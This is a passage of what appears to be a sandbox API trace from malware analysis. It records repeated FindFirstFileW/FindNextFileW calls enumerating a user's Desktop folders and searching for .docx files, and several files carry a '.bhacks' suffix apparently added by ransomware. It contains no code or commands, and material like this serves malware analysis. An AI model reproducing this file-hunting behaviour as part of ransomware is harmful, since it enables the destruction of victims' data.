ftCreationTime.dwLowDateTime=0xd4f31cb0, ftCreationTime.dwHighDateTime=0x1d5d48c, ftLastAccessTime.dwLowDateTime=0x8a825cf0, ftLastAccessTime.dwHighDateTime=0x1d5ca63, ftLastWriteTime.dwLowDateTime=0x8a825cf0, ftLastWriteTime.dwHighDateTime=0x1d5ca63, nFileSizeHigh=0x0, nFileSizeLow=0xd9f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="EkLB 1ywsMV77uH53.wav", cAlternateFileName="EKLB1Y~1.WAV")) returned 1 [0064.983] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56e63d70, ftCreationTime.dwHighDateTime=0x1d5cf5f, ftLastAccessTime.dwLowDateTime=0x61643820, ftLastAccessTime.dwHighDateTime=0x1d5cbfd, ftLastWriteTime.dwLowDateTime=0x61643820, ftLastWriteTime.dwHighDateTime=0x1d5cbfd, nFileSizeHigh=0x0, nFileSizeLow=0x11fe4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ERgdUGLd4HevVs5.odt", cAlternateFileName="ERGDUG~1.ODT")) returned 1 [0064.984] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b11b8b0, ftCreationTime.dwHighDateTime=0x1d5c84e, ftLastAccessTime.dwLowDateTime=0x62c618a0, ftLastAccessTime.dwHighDateTime=0x1d5c9b9, ftLastWriteTime.dwLowDateTime=0x62c618a0, ftLastWriteTime.dwHighDateTime=0x1d5c9b9, nFileSizeHigh=0x0, nFileSizeLow=0x7189, dwReserved0=0x0, dwReserved1=0x0, cFileName="fqpL_g35J.m4a", cAlternateFileName="FQPL_G~1.M4A")) returned 1 [0064.984] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc87e190, ftCreationTime.dwHighDateTime=0x1d5d4f7, ftLastAccessTime.dwLowDateTime=0x337ee530, ftLastAccessTime.dwHighDateTime=0x1d5caa0, ftLastWriteTime.dwLowDateTime=0x337ee530, ftLastWriteTime.dwHighDateTime=0x1d5caa0, nFileSizeHigh=0x0, nFileSizeLow=0x1868d, dwReserved0=0x0, dwReserved1=0x0, cFileName="i6 iY_C6BkJ.m4a", cAlternateFileName="I6IY_C~1.M4A")) returned 1 [0064.984] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23c2351d, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23c2351d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x23e85b50, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x10260, dwReserved0=0x0, dwReserved1=0x0, cFileName="j51yJlAI1.gif.bhacks", cAlternateFileName="J51YJL~1.BHA")) returned 1 [0064.984] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38e7c380, ftCreationTime.dwHighDateTime=0x1d5d648, ftLastAccessTime.dwLowDateTime=0xe93bdd60, ftLastAccessTime.dwHighDateTime=0x1d5d4c8, ftLastWriteTime.dwLowDateTime=0xe93bdd60, ftLastWriteTime.dwHighDateTime=0x1d5d4c8, nFileSizeHigh=0x0, nFileSizeLow=0x9417, dwReserved0=0x0, dwReserved1=0x0, cFileName="JkNoq.avi", cAlternateFileName="")) returned 1 [0064.984] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b79f760, ftCreationTime.dwHighDateTime=0x1d5d23a, ftLastAccessTime.dwLowDateTime=0x3cfbbf90, ftLastAccessTime.dwHighDateTime=0x1d5c9db, ftLastWriteTime.dwLowDateTime=0x3cfbbf90, ftLastWriteTime.dwHighDateTime=0x1d5c9db, nFileSizeHigh=0x0, nFileSizeLow=0xfb6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="J_gUxI4K04bkqo7tW4.avi", cAlternateFileName="J_GUXI~1.AVI")) returned 1 [0064.984] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b501110, ftCreationTime.dwHighDateTime=0x1d5d535, ftLastAccessTime.dwLowDateTime=0xa751ce0, ftLastAccessTime.dwHighDateTime=0x1d5cba4, ftLastWriteTime.dwLowDateTime=0xa751ce0, ftLastWriteTime.dwHighDateTime=0x1d5cba4, nFileSizeHigh=0x0, nFileSizeLow=0x454f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kz5g.mp4", cAlternateFileName="")) returned 1 [0064.985] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23ef8520, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23ef8520, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2402951c, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x2da0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mCQMPnOOyUYP.gif.bhacks", cAlternateFileName="MCQMPN~1.BHA")) returned 1 [0064.985] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54866930, ftCreationTime.dwHighDateTime=0x1d5d66a, ftLastAccessTime.dwLowDateTime=0x5f4a3830, ftLastAccessTime.dwHighDateTime=0x1d5d023, ftLastWriteTime.dwLowDateTime=0x5f4a3830, ftLastWriteTime.dwHighDateTime=0x1d5d023, nFileSizeHigh=0x0, nFileSizeLow=0xecc, dwReserved0=0x0, dwReserved1=0x0, cFileName="MdUrzCG7I8VQVwhMz8.rtf", cAlternateFileName="MDURZC~1.RTF")) returned 1 [0064.985] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3022d80, ftCreationTime.dwHighDateTime=0x1d5cb0f, ftLastAccessTime.dwLowDateTime=0x7517fd0, ftLastAccessTime.dwHighDateTime=0x1d5d596, ftLastWriteTime.dwLowDateTime=0x7517fd0, ftLastWriteTime.dwHighDateTime=0x1d5d596, nFileSizeHigh=0x0, nFileSizeLow=0x80c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="MH23a5.bmp", cAlternateFileName="")) returned 1 [0064.985] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e6a2940, ftCreationTime.dwHighDateTime=0x1d5d2ed, ftLastAccessTime.dwLowDateTime=0xbbd52910, ftLastAccessTime.dwHighDateTime=0x1d5c822, ftLastWriteTime.dwLowDateTime=0xbbd52910, ftLastWriteTime.dwHighDateTime=0x1d5c822, nFileSizeHigh=0x0, nFileSizeLow=0xb5e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="nYVw1n1XTh2-sApcS7w.mp4", cAlternateFileName="NYVW1N~1.MP4")) returned 1 [0064.985] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7910b730, ftCreationTime.dwHighDateTime=0x1d5d221, ftLastAccessTime.dwLowDateTime=0x2c63f080, ftLastAccessTime.dwHighDateTime=0x1d5cce2, ftLastWriteTime.dwLowDateTime=0x2c63f080, ftLastWriteTime.dwHighDateTime=0x1d5cce2, nFileSizeHigh=0x0, nFileSizeLow=0xd499, dwReserved0=0x0, dwReserved1=0x0, cFileName="og9u_G4EHl49Tl.flv", cAlternateFileName="OG9U_G~1.FLV")) returned 1 [0064.985] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4212db0, ftCreationTime.dwHighDateTime=0x1d5d63b, ftLastAccessTime.dwLowDateTime=0xa0b30de0, ftLastAccessTime.dwHighDateTime=0x1d5d78c, ftLastWriteTime.dwLowDateTime=0xa0b30de0, ftLastWriteTime.dwHighDateTime=0x1d5d78c, nFileSizeHigh=0x0, nFileSizeLow=0x408e, dwReserved0=0x0, dwReserved1=0x0, cFileName="QgQCsu7ShKSSIL.m4a", cAlternateFileName="QGQCSU~1.M4A")) returned 1 [0064.985] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88b6f190, ftCreationTime.dwHighDateTime=0x1d5d631, ftLastAccessTime.dwLowDateTime=0x1cebe780, ftLastAccessTime.dwHighDateTime=0x1d5d024, ftLastWriteTime.dwLowDateTime=0x1cebe780, ftLastWriteTime.dwHighDateTime=0x1d5d024, nFileSizeHigh=0x0, nFileSizeLow=0x7bd2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tab3I0y Y3.avi", cAlternateFileName="TAB3I0~1.AVI")) returned 1 [0064.986] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c10d530, ftCreationTime.dwHighDateTime=0x1d5cb12, ftLastAccessTime.dwLowDateTime=0xe28a1830, ftLastAccessTime.dwHighDateTime=0x1d5d390, ftLastWriteTime.dwLowDateTime=0xe28a1830, ftLastWriteTime.dwHighDateTime=0x1d5d390, nFileSizeHigh=0x0, nFileSizeLow=0x1e8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="TtFu8ac2GuQ.mp3", cAlternateFileName="TTFU8A~1.MP3")) returned 1 [0064.986] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c15f530, ftCreationTime.dwHighDateTime=0x1d5d49d, ftLastAccessTime.dwLowDateTime=0x2fe34c90, ftLastAccessTime.dwHighDateTime=0x1d5d801, ftLastWriteTime.dwLowDateTime=0x2fe34c90, ftLastWriteTime.dwHighDateTime=0x1d5d801, nFileSizeHigh=0x0, nFileSizeLow=0x6236, dwReserved0=0x0, dwReserved1=0x0, cFileName="vY9PyxRY3.odp", cAlternateFileName="VY9PYX~1.ODP")) returned 1 [0064.986] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x241cd0f6, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x241cd0f6, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2421963f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x3450, dwReserved0=0x0, dwReserved1=0x0, cFileName="W3nCKPmZd6_T8yGD3CRn.jpg.bhacks", cAlternateFileName="W3NCKP~1.BHA")) returned 1 [0064.986] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb154e40, ftCreationTime.dwHighDateTime=0x1d5ce80, ftLastAccessTime.dwLowDateTime=0x71f710b0, ftLastAccessTime.dwHighDateTime=0x1d5d263, ftLastWriteTime.dwLowDateTime=0x71f710b0, ftLastWriteTime.dwHighDateTime=0x1d5d263, nFileSizeHigh=0x0, nFileSizeLow=0xa113, dwReserved0=0x0, dwReserved1=0x0, cFileName="WLViPvkU.mp4", cAlternateFileName="")) returned 1 [0064.986] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x1e92de00, ftLastAccessTime.dwHighDateTime=0x1d5c853, ftLastWriteTime.dwLowDateTime=0x1e92de00, ftLastWriteTime.dwHighDateTime=0x1d5c853, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yi TyUTEx1dVRHalW", cAlternateFileName="YITYUT~1")) returned 1 [0064.986] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92ca540, ftCreationTime.dwHighDateTime=0x1d5c8c0, ftLastAccessTime.dwLowDateTime=0xc2425e30, ftLastAccessTime.dwHighDateTime=0x1d5c9e9, ftLastWriteTime.dwLowDateTime=0xc2425e30, ftLastWriteTime.dwHighDateTime=0x1d5c9e9, nFileSizeHigh=0x0, nFileSizeLow=0xcf42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZvWDNly8ss.csv", cAlternateFileName="ZVWDNL~1.CSV")) returned 1 [0064.987] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92ca540, ftCreationTime.dwHighDateTime=0x1d5c8c0, ftLastAccessTime.dwLowDateTime=0xc2425e30, ftLastAccessTime.dwHighDateTime=0x1d5c9e9, ftLastWriteTime.dwLowDateTime=0xc2425e30, ftLastWriteTime.dwHighDateTime=0x1d5c9e9, nFileSizeHigh=0x0, nFileSizeLow=0xcf42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZvWDNly8ss.csv", cAlternateFileName="ZVWDNL~1.CSV")) returned 0 [0064.987] FindClose (in: hFindFile=0x9bf140 | out: hFindFile=0x9bf140) returned 1 [0064.987] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*.docx", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0064.987] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bee40 [0064.987] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.987] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a026230, ftCreationTime.dwHighDateTime=0x1d5c8dc, ftLastAccessTime.dwLowDateTime=0xce447400, ftLastAccessTime.dwHighDateTime=0x1d5d6f2, ftLastWriteTime.dwLowDateTime=0xce447400, ftLastWriteTime.dwHighDateTime=0x1d5d6f2, nFileSizeHigh=0x0, nFileSizeLow=0x619e, dwReserved0=0x0, dwReserved1=0x0, cFileName="5E4_Kcg6cqpR-gwb.swf", cAlternateFileName="5E4_KC~1.SWF")) returned 1 [0064.988] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccb40900, ftCreationTime.dwHighDateTime=0x1d5d73f, ftLastAccessTime.dwLowDateTime=0xdb0cc290, ftLastAccessTime.dwHighDateTime=0x1d5d0cc, ftLastWriteTime.dwLowDateTime=0xdb0cc290, ftLastWriteTime.dwHighDateTime=0x1d5d0cc, nFileSizeHigh=0x0, nFileSizeLow=0x15772, dwReserved0=0x0, dwReserved1=0x0, cFileName="6xiRzqk0e.mp3", cAlternateFileName="6XIRZQ~1.MP3")) returned 1 [0064.988] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf01d96e0, ftCreationTime.dwHighDateTime=0x1d5d6ea, ftLastAccessTime.dwLowDateTime=0x726bd8e0, ftLastAccessTime.dwHighDateTime=0x1d5c85a, ftLastWriteTime.dwLowDateTime=0x726bd8e0, ftLastWriteTime.dwHighDateTime=0x1d5c85a, nFileSizeHigh=0x0, nFileSizeLow=0xbe65, dwReserved0=0x0, dwReserved1=0x0, cFileName="FisMdRNWBNOEJ4Av.swf", cAlternateFileName="FISMDR~1.SWF")) returned 1 [0064.988] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7febd840, ftCreationTime.dwHighDateTime=0x1d5d678, ftLastAccessTime.dwLowDateTime=0x2be003f0, ftLastAccessTime.dwHighDateTime=0x1d5d729, ftLastWriteTime.dwLowDateTime=0x2be003f0, ftLastWriteTime.dwHighDateTime=0x1d5d729, nFileSizeHigh=0x0, nFileSizeLow=0x7812, dwReserved0=0x0, dwReserved1=0x0, cFileName="JFBPLC7ZEPj.ppt", cAlternateFileName="JFBPLC~1.PPT")) returned 1 [0064.988] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd50430, ftCreationTime.dwHighDateTime=0x1d5d21c, ftLastAccessTime.dwLowDateTime=0xf6f6dab0, ftLastAccessTime.dwHighDateTime=0x1d5ce31, ftLastWriteTime.dwLowDateTime=0xf6f6dab0, ftLastWriteTime.dwHighDateTime=0x1d5ce31, nFileSizeHigh=0x0, nFileSizeLow=0x42b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="RJ4fo8BlUIkNkFgvJDB3.wav", cAlternateFileName="RJ4FO8~1.WAV")) returned 1 [0064.988] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uqU-SQkb", cAlternateFileName="")) returned 1 [0064.988] FindNextFileW (in: hFindFile=0x9bee40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uqU-SQkb", cAlternateFileName="")) returned 0 [0064.988] FindClose (in: hFindFile=0x9bee40 | out: hFindFile=0x9bee40) returned 1 [0064.989] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\*.docx", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0065.039] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9be540 [0065.040] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.040] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bda560, ftCreationTime.dwHighDateTime=0x1d5c954, ftLastAccessTime.dwLowDateTime=0xb7ba9f80, ftLastAccessTime.dwHighDateTime=0x1d5cd4b, ftLastWriteTime.dwLowDateTime=0xb7ba9f80, ftLastWriteTime.dwHighDateTime=0x1d5cd4b, nFileSizeHigh=0x0, nFileSizeLow=0x3271, dwReserved0=0x0, dwReserved1=0x0, cFileName="DOdivRJBTXgzUJ.wav", cAlternateFileName="DODIVR~1.WAV")) returned 1 [0065.040] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71fd8190, ftCreationTime.dwHighDateTime=0x1d5d3dd, ftLastAccessTime.dwLowDateTime=0x25c817f0, ftLastAccessTime.dwHighDateTime=0x1d5ce55, ftLastWriteTime.dwLowDateTime=0x25c817f0, ftLastWriteTime.dwHighDateTime=0x1d5ce55, nFileSizeHigh=0x0, nFileSizeLow=0xb4eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="E2jRFWUv.xlsx", cAlternateFileName="E2JRFW~1.XLS")) returned 1 [0065.040] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9298a40, ftCreationTime.dwHighDateTime=0x1d5cdc4, ftLastAccessTime.dwLowDateTime=0xb615c9a0, ftLastAccessTime.dwHighDateTime=0x1d5d360, ftLastWriteTime.dwLowDateTime=0xb615c9a0, ftLastWriteTime.dwHighDateTime=0x1d5d360, nFileSizeHigh=0x0, nFileSizeLow=0x68aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="krWg9z-VUaci.wav", cAlternateFileName="KRWG9Z~1.WAV")) returned 1 [0065.040] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5714a10, ftCreationTime.dwHighDateTime=0x1d5d59b, ftLastAccessTime.dwLowDateTime=0xafa97800, ftLastAccessTime.dwHighDateTime=0x1d5d2cf, ftLastWriteTime.dwLowDateTime=0xafa97800, ftLastWriteTime.dwHighDateTime=0x1d5d2cf, nFileSizeHigh=0x0, nFileSizeLow=0x10b8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="KsPC3.bmp", cAlternateFileName="")) returned 1 [0065.041] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0240, ftCreationTime.dwHighDateTime=0x1d5d7c3, ftLastAccessTime.dwLowDateTime=0x626ed2a0, ftLastAccessTime.dwHighDateTime=0x1d5ccb3, ftLastWriteTime.dwLowDateTime=0x626ed2a0, ftLastWriteTime.dwHighDateTime=0x1d5ccb3, nFileSizeHigh=0x0, nFileSizeLow=0xad34, dwReserved0=0x0, dwReserved1=0x0, cFileName="kZHWiDNy.mp4", cAlternateFileName="")) returned 1 [0065.041] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2d402a0, ftCreationTime.dwHighDateTime=0x1d5d269, ftLastAccessTime.dwLowDateTime=0x6cdeacf0, ftLastAccessTime.dwHighDateTime=0x1d5d1eb, ftLastWriteTime.dwLowDateTime=0x6cdeacf0, ftLastWriteTime.dwHighDateTime=0x1d5d1eb, nFileSizeHigh=0x0, nFileSizeLow=0xad19, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oo6K.m4a", cAlternateFileName="")) returned 1 [0065.041] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcbaf9c0, ftCreationTime.dwHighDateTime=0x1d5d70b, ftLastAccessTime.dwLowDateTime=0x47b550f0, ftLastAccessTime.dwHighDateTime=0x1d5c91c, ftLastWriteTime.dwLowDateTime=0x47b550f0, ftLastWriteTime.dwHighDateTime=0x1d5c91c, nFileSizeHigh=0x0, nFileSizeLow=0x168cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="TXjqoZIp1 VeX-aMqDQ6.bmp", cAlternateFileName="TXJQOZ~1.BMP")) returned 1 [0065.041] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcbaf9c0, ftCreationTime.dwHighDateTime=0x1d5d70b, ftLastAccessTime.dwLowDateTime=0x47b550f0, ftLastAccessTime.dwHighDateTime=0x1d5c91c, ftLastWriteTime.dwLowDateTime=0x47b550f0, ftLastWriteTime.dwHighDateTime=0x1d5c91c, nFileSizeHigh=0x0, nFileSizeLow=0x168cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="TXjqoZIp1 VeX-aMqDQ6.bmp", cAlternateFileName="TXJQOZ~1.BMP")) returned 0 [0065.041] FindClose (in: hFindFile=0x9be540 | out: hFindFile=0x9be540) returned 1 [0065.041] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\*.docx", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0065.042] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\*", lpFindFileData=0x6fe790 | out: 